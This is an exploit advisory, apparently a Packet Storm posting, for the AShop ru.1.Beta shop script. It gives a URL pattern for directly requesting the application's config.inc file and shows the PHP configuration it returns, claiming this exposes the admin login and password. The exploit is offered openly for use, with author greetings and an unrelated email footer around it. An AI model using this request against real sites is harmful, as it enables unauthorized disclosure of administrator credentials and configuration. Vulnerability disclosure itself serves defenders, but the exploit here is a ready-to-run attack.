AShop version ru.1.Beta suffers from a remote database configuration disclosure vulnerability.
fded7097c9fbd4a2b01c23bd5b87959fd862927fea8c453911ba2b7f5a209667
< ------------------- header data start ------------------- >
#############################################################
# Application Name : AShop ru.1.Beta
# Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability
# Infection : Admin Login Password Get...
# Author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/AShop.rar.html - http://softsearch.ru/programs/30-132-ashop-ru-download.shtml
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://[target]/[path]/config.inc
GET TO;
<?
define('A_LOGIN', 'admin');
define('A_TITLE', '');
define('A_CACHE', 'TRUE'); //Ôóíê
define('A_CACHE_TIME', '21600');
define('A_ADV', 'TRUE');
define('A_ADV_HTTP', 'TRUE');
?>
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...
_________________________________________________________________
Windows Live tüm arkadaþlarýnýzla tek bir yerden iletiþim kurmanýza yardýmcý olur.
http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed